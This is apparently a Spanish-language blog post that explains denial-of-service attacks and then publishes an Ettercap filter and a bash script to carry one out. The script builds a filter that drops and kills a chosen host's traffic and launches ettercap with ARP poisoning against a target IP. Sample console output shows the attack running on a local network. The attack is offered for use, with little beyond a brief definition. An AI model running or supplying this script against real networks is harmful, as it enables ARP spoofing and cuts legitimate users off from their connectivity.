Buenas tardes,
Hoy voy a publicar un pequeño filtro para Ettercap para realizar una denegación de servicio.
Que es un ataque DOS:
En seguridad informática, un ataque de denegación de servicio, también llamado ataque DoS(de las siglas en inglés Denial of Service), es un ataque a un sistema de computadoras o red que causa que un servicio o recurso sea inaccesible a los usuarios legítimos. Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos computacionales del sistema de la víctima.
Se genera mediante la saturación de los puertos con flujo de información, haciendo que el servidorse sobrecargue y no pueda seguir prestando servicios, por eso se le denomina “denegación”, pues hace que el servidor no dé abasto a la cantidad de solicitudes. Esta técnica es usada por los llamados Crackers para dejar fuera de servicio a servidores objetivo.
Filtro Ettercap
if (ip.src == 'DIRECCION IP ' || ip.dst == 'DIRECCION IP') { drop(); kill(); }
Para no tener que editar el fichero del filtro e creado un pequeño Script muy guarro la verdad… pero bueno. funciona jajaja.
#!/bin/bash #Script ddos Ettercap #Miramos si el usuario que este ejecutando es root. si no lo es, hacemos un exit if [ $(whoami) != "root" ]; then echo "Debes ser root para correr este script." echo "Para entrar como root, escribe \"su\" sin las comillas." exit 1 #Miramos si tiene instalado el Ettercap, si no lo tiene hacemos un exit elif [ ! -x "/usr/sbin/ettercap" ]; then echo "Parece que no tienes instalado Ettercap" echo "Para instalarlo en distribuciones basadas en Debian: apt-get install ettercap" echo "Para instalarlo en distribuciones basadas en Redhat: yum install ettercap" exit 1 fi #Ponemos un a cabecera bonita echo echo " Script ddos Ettercap" echo "_____ ____ __________________" echo #Preguntamos la dirección Origen, Destino y la interfaz read -p "Introduzca direccion origen: " ipsrc read -p "Introduzca direccion destino: " ipdst read -p "Introduzca la Interfaz. Ejemplo eth0: " inter #Miramos si el archivo dos.eft existe, en caso que exista lo borramos #Y lo creamos de nuevo con la configuracion añadida anteriormente #Es una gilipollez pero nose porque lo echo asi if [ -e dos.eft ] then rm -r dos.eft echo "if (ip.src == '$ipsrc' || ip.dst == '$ipdst') " >> dos.eft echo "{" >> dos.eft echo "drop();" >> dos.eft echo "kill();" >> dos.eft echo "msg('Toma kill 9!!!!');" dos.eft echo "}" >> dos.eft #Una vez generado el archivo hacemos un etterfilter para generar dos.ef etterfilter dos.eft -o dos.ef #En el caso que el archivo dos.eft no existiese hacemos lo mismo #Genera el archivo y le pasa los datos agregados anteriormente else echo "if (ip.src == $ipsrc || ip.dst == $ipdst) {" > dos.eft echo "drop();" > dos.eft echo "kill();" > dos.eft echo "msg('Toma kill 9!!!!');" dos.eft echo "}" > dos.eft etterfilter dos.eft -o dos.ef fi #Comprueba que dos.ef exista, si existe realizamos el ataque. if [ -e dos.ef ] then ettercap -T -q -F dos.ef -M ARP /$ipdst/ // -i $inter #En caso que no exista lo creamos con etterfilter y empezamos el ataque else etterfilter dos.eft -o dos.ef ettercap -T -q -F dos.ef -M ARP /$ipdst/ // -i $inter fi
Atacante
Ejemplo: de utilización:
rokitoh@red-orbitasudo:~# sh ddos.sh
Script ddos Ettercap
_____ ____ __________________
Introduzca direccion origen: 192.168.1.100
Introduzca direccion destino: 192.168.1.105
Introduzca la Interfaz. Ejemplo eth0: eth1
msg(‘Toma kill 9!!!!’); dos.eft
etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
Parsing source file ‘dos.eft’ done.
Unfolding the meta-tree done.
Converting labels to real offsets done.
Writing output to ‘dos.ef’ done.
-> Script encoded into 7 instructions.
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Content filters loaded from dos.ef…
Listening on eth1… (Ethernet)
eth1 -> 00:1F:D0:21:E9:3F 192.168.1.102 255.255.255.0
SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
* |==================================================>| 100.00 %
3 hosts added to the hosts list…
ARP poisoning victims:
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…
Victima: